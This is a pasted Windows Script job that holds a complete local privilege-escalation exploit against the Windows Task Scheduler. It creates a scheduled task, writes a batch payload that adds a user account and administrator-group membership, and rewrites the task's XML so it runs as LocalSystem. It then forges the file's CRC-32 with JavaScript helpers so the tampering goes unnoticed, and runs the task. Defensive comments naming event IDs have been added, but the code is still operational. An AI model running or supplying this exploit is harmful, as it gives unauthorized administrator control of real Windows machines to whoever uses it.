Djdj

a guest Mar 19th, 2019 87 Never
  1. <job id="tasksch-wD-0day">
  2. <script language="Javascript">
  3.  
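// CRC-32 lookup table for the reflected polynomial 0xEDB88320 (the zlib/PKZIP
// table: entry 1 is 0x77073096, entry 128 is 0xEDB88320, entry 255 is 0x2D02EF8D).
// Generated from the polynomial instead of being spelled out as 256 literals so
// the constants cannot drift, and declared with `var` rather than leaking as an
// implicit global. Consumed by calc_crc and rev_crc below.
var crc_table = (function () {
    var table = new Array(256);
    for (var n = 0; n < 256; n++) {
        var c = n;
        for (var k = 0; k < 8; k++) {
            c = (c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1);
        }
        table[n] = c >>> 0; // keep every entry non-negative, like the original literals
    }
    return table;
})();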
  58.  
// Uppercase hex digit alphabet indexed by nibble value (0..15); used by dec2hex.
var hD = "0123456789ABCDEF";
  60.  
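/**
 * Formats the low 32 bits of d as exactly eight uppercase hex digits,
 * zero-padded (255 -> "000000FF", -1 -> "FFFFFFFF").
 * The original wrote to `h` and `i` without `var`, leaking two globals; all
 * state is local now and the hD lookup string is no longer needed.
 * @param {number} d value to format; coerced to an unsigned 32-bit integer
 * @returns {string} eight hex digits, most significant first
 */
function dec2hex(d) {
    var hex = (d >>> 0).toString(16).toUpperCase();
    while (hex.length < 8) {
        hex = "0" + hex;
    }
    return hex;
}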
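/**
 * Hex-encodes each character of str as two lowercase hex digits, so the output
 * round-trips through decodeFromHex (which consumes two digits per byte) and
 * matches the two-digits-per-byte format used throughout this file.
 * The original padded to three digits, which decodeFromHex cannot parse back.
 * Characters above 0xFF still produce more than two digits and will not round-trip.
 * @param {string} str input string
 * @returns {string} hex encoding, two digits per character
 */
function encodeToHex(str) {
    var out = "";
    for (var pos = 0; pos < str.length; pos++) {
        var h = str.charCodeAt(pos).toString(16);
        if (h.length < 2) h = "0" + h;
        out += h;
    }
    return out;
}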
/**
 * Inverse of a two-digits-per-byte hex encoding: each pair of hex digits becomes
 * one character with that code. A trailing odd digit is ignored; a pair that is
 * not valid hex yields "\u0000" because "0x.." coerces to NaN.
 * @param {string} str hex string
 * @returns {string} decoded characters, one per digit pair
 */
function decodeFromHex(str) {
    var out = "";
    for (var pos = 0; pos + 1 < str.length; pos += 2) {
        out += String.fromCharCode(Number("0x" + str.substring(pos, pos + 2)));
    }
    return out;
}
  96.  
  97.  
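/**
 * CRC-32 of a hex-encoded byte string: table-driven, initial value 0xFFFFFFFF,
 * final XOR 0xFFFFFFFF (the standard zlib/PKZIP variant, given crc_table's
 * polynomial 0xEDB88320).
 * Depends on the script-level crc_table, decodeFromHex and dec2hex.
 * The original kept its working state in implicit globals shared with rev_crc;
 * everything is local now.
 * @param {string} anyForm hex string, two digits per byte, as decodeFromHex expects
 * @returns {string} eight uppercase hex digits
 */
function calc_crc(anyForm) {
    var bytes = decodeFromHex(anyForm);
    var crc = 0xFFFFFFFF;
    for (var i = 0; i < bytes.length; i++) {
        var tableIndex = (bytes.charCodeAt(i) ^ crc) & 0xFF;
        crc = (crc >>> 8) ^ crc_table[tableIndex];
    }
    crc ^= 0xFFFFFFFF;
    return dec2hex(crc);
}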
  114.  
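/**
 * Given hex-encoded byte strings leadString and endString (two digits per byte)
 * and a target checksum crc32 (eight hex digits), computes the four bytes X for
 * which CRC-32(lead + X + end) equals the target. Returns X as eight hex digits
 * with the byte order reversed relative to dec2hex's output (see the final
 * substring shuffle).
 * Depends on the script-level crc_table, decodeFromHex and dec2hex.
 * The original kept its working state in implicit globals shared with calc_crc;
 * everything is local now. Being able to do this in a few hundred table lookups
 * is why a CRC must never be relied on as a tamper-detection check.
 * @param {string} leadString bytes before the patch position
 * @param {string} endString bytes after the patch position
 * @param {string} crc32 target CRC-32 as produced by calc_crc
 * @returns {string} eight hex digits
 */
function rev_crc(leadString, endString, crc32) {
    var i, tableIndex, Table_value;

    // 1. Forward CRC state after consuming leadString (no final XOR applied).
    var leadBytes = decodeFromHex(leadString);
    var Crc_value = 0xFFFFFFFF;
    for (i = 0; i < leadBytes.length; i++) {
        tableIndex = (leadBytes.charCodeAt(i) ^ Crc_value) & 0xFF;
        Table_value = crc_table[tableIndex];
        Crc_value >>>= 8;
        Crc_value ^= Table_value;
    }

    // 2. Run the target state backwards through endString (last byte first) to
    //    recover the CRC state that must hold just before endString.
    var crc = parseInt(crc32, 16);
    crc ^= 0xFFFFFFFF; // undo the forward algorithm's final XOR
    var tailBytes = decodeFromHex(endString);
    var tailLen = tailBytes.length;
    for (i = 0; i < tailLen; i++) {
        // find the table entry whose high byte matches the current high byte
        tableIndex = 0;
        Table_value = crc_table[tableIndex];
        while (((Table_value ^ crc) >>> 24) & 0xFF) {
            tableIndex++;
            Table_value = crc_table[tableIndex];
        }
        crc ^= Table_value;
        crc <<= 8;
        crc |= tableIndex ^ tailBytes.charCodeAt(tailLen - i - 1);
    }

    // 3. Four more inverse steps; XOR with the forward state gives the patch value.
    for (i = 0; i < 4; i++) {
        tableIndex = 0;
        Table_value = crc_table[tableIndex];
        while (((Table_value ^ crc) >>> 24) & 0xFF) {
            tableIndex++;
            Table_value = crc_table[tableIndex];
        }
        crc ^= Table_value;
        crc <<= 8;
        crc |= tableIndex;
    }
    crc ^= Crc_value;

    // 4. dec2hex emits the most significant byte first; swap the four byte
    //    pairs so the result is in the opposite order.
    var big = dec2hex(crc);
    return big.substring(6, 8) + big.substring(4, 6) + big.substring(2, 4) + big.substring(0, 2);
}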
/**
 * Verbatim duplicate of the decodeFromHex declared earlier in this script.
 * Function declarations are hoisted, so this later copy is the one bound at
 * run time; either copy can be removed without changing behaviour.
 * Turns pairs of hex digits into characters (two digits per byte); an odd
 * trailing digit is dropped and a non-hex pair becomes "\u0000".
 * @param {string} str hex string
 * @returns {string} decoded characters
 */
function decodeFromHex(str) {
    var chars = [];
    var remaining = str.length;
    var at = 0;
    while (remaining > 1) {
        chars.push(String.fromCharCode(Number("0x" + str.substr(at, 2))));
        at += 2;
        remaining -= 2;
    }
    return chars.join("");
}
  189. </script>
  190.  
  191.  
  192.  
  193. <script language="VBScript">
' Banner on stdout; this is a .wsf job, so wscript.stdout is available under cscript.
dim output
set output = wscript.stdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
' GetSpecialFolder(2) is the caller's Temp folder; the task action (/tr) points at a
' batch file there. Defensive note: a scheduled task whose action lives in a per-user
' Temp directory is a strong indicator on its own (Security event 4698, task created).
biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True

' Batch payload: local account creation and a local-group membership change, then the
' task deletes itself. Defensive note: Security events 4720 (user created) and 4732
' (member added to a security-enabled local group) record the first two actions.
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.CreateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add v4l")
a.WriteLine ("schtasks /delete /f /TN wDw00t")
  208.  
  209. Function ReadByteArray(strFileName)
  210. Const adTypeBinary = 1
  211. Dim bin
  212.     Set bin = CreateObject("ADODB.Stream")
  213.     bin.Type = adTypeBinary
  214.     bin.Open
  215.     bin.LoadFromFile strFileName
  216.     ReadByteArray = bin.Read
  217. 'output.writeline ReadByteArray
  218. End Function
  219.  
  220. Function OctetToHexStr (arrbytOctet)
  221.  Dim k
  222.  OctetToHexStr = ""
  223.  For k = 3 To Lenb (arrbytOctet)
  224.   OctetToHexStr = OctetToHexStr _
  225.         & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
  226.  Next
  227.  End Function
' On-disk definition of the task registered above. Defensive note: this is the artifact
' rewritten below; file-integrity monitoring on the Tasks folder, or auditing writes to
' it by non-SYSTEM processes, catches this class of tampering (Security event 4702, task updated).
strFileName="C:\windows\system32\tasks\wDw00t"

' Checksum of the task file as the Scheduler stored it, via the JavaScript calc_crc in
' this job. OctetToHexStr starts at byte 3, so the file's two-byte prefix is skipped.
hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 Original: "+crc32


Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
' The task XML is obtained through schtasks /query /XML rather than read from the file.
Set objShell = WScript.CreateObject("WScript.Shell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")

' strLine is never initialised; VBScript concatenates Empty & string as a plain string.
Do Until objExecObject.StdOut.AtEndOfStream
 strLine = strLine & objExecObject.StdOut.ReadLine()
Loop
' "FFFE" followed by "3C00" ("<" as UTF-16 LE) is prepended; presumably a byte-order mark
' restoring what OctetToHexStr skipped — confirm. The bytes are written to wDw00t.xml in
' the current directory one Chr at a time.
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = fso.createtextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
 ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
ts.close

' The tampering step: Author and the Principal's UserId are set to S-1-5-18 (LocalSystem)
' and the modified XML is saved over the task file. Defensive note: a task whose
' Principal/UserId is S-1-5-18 but whose registration was not performed by an
' administrative process is a useful hunting query.
xmlDoc.load "wDw00t.xml"
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
xmldoc.save(strFileName)

hexXML = OctetToHexStr (ReadByteArray(strFileName))

' "3C0021002D002D00" and "2D002D003E00" are "<!--" and "-->" in UTF-16 LE: an XML comment
' is appended, and rev_crc (JavaScript) chooses the four bytes inside it that make the
' whole file's CRC-32 equal the original value. The page does not state why the checksum
' matters; presumably the Scheduler compares it, which is why a CRC is unfit for integrity.
leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes

finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge

' Writes the patched bytes back with the FFFE prefix restored. `stream` is created but never used.
strHexString="FFFE"+finalString
Set fso = CreateObject ("scripting.filesystemobject")
Set stream = CreateObject ("adodb.stream")

Set ts = fso.createtextfile (strFileName)

For n = 1 To (Len (strHexString) - 1) step 2
 ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
ts.close


' Disable/enable the task (presumably to make the Scheduler re-read the definition —
' confirm) and trigger it. Defensive note: schtasks /change followed immediately by /run
' on a task created moments earlier is itself anomalous and worth correlating.
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /change /TN wDw00t /disable",,True
objShell.Run "schtasks /change /TN wDw00t /enable",,True
objShell.Run "schtasks /run /TN wDw00t",,True
  289.  
  290. </script>
  291. </job>